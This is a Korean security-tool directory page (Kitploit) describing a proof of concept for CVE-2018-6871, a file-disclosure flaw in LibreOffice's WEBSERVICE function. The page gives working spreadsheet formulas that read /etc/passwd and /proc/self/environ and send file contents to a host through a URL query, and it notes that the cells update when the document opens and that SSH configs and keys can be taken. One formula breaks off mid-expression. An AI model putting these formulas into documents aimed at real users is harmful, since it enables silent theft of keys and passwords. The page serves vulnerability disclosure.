Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
libreoffice-remote-arbitrary-file-disclosure — Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability | Kitploit
도구/GitHubGitHub/jollheef/libreoffice-remote-arbitrary-file-disclosure
Vulnerability AnalysisExploitationData ExfiltrationInformation Gathering
GitHubjollheef/libreoffice-remote-arbitrary-file-disclosure

libreoffice-remote-arbitrary-file-disclosure

Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
9698년 전Kitploit 검토 완료

취약점 설명

CVE-2018-6871

첫 번째 부분

LibreOffice는 COM.MICROSOFT.WEBSERVICE 함수를 지원합니다:

root@kitploit:~
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

이 함수는 URL로 데이터를 가져오는 데 필요하며, 보통 다음과 같이 사용됩니다:

root@kitploit:~
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

원문에서는:

지원되지 않는 프로토콜(예: ftp:// 또는 file://)의 경우 WEBSERVICE는 #VALUE! 오류 값을 반환합니다.

LibreOffice에서는 5.4.5/6.0.1 이전 버전에 이러한 제한이 구현되어 있지 않습니다.

두 번째 부분

기본적으로 셀은 업데이트되지 않지만, ~error 같은 셀 유형을 지정하면 문서를 열 때 셀이 업데이트됩니다.

악용

파일을 읽으려면 다음만 하면 됩니다:

root@kitploit:~
=WEBSERVICE("/etc/passwd")

이 함수는 파일을 전송하는 데에도 사용할 수 있습니다:

root@kitploit:~
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

성공적인 공격을 위해서는 현재 사용자의 파일을 전송해야 하므로, 현재 사용자의 홈 경로를 알아내야 합니다.

root@kitploit:~
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

또한 ~/.ssh/config 같은 다른 파일도 파싱할 수 있습니다.

LibreOffice Calc 형식이 아닌 다른 형식의 경우 calc 객체를 다른 문서에 포함시키기만 하면 됩니다(동작하는 것을 확인했습니다).

영향

키, 비밀번호 및 기타 모든 파일을 쉽게 전송할 수 있습니다. 100% 성공률, 완전히 은밀하며, 모든 운영 체제(GNU/Linux, MS Windows, macOS 등)에서 5.4.5/6.0.1 이전의 LibreOffice에 영향을 미치며, LO가 지원하는 거의 모든 형식에 포함될 수 있습니다.

감사의 말

이 취약점은 저(@jollheef)와 Ronnie Goodrich && Andrew Krasichkov가 각각 독립적으로 발견했습니다(LibreOffice 팀 노트에 따르면).

도구 다운로드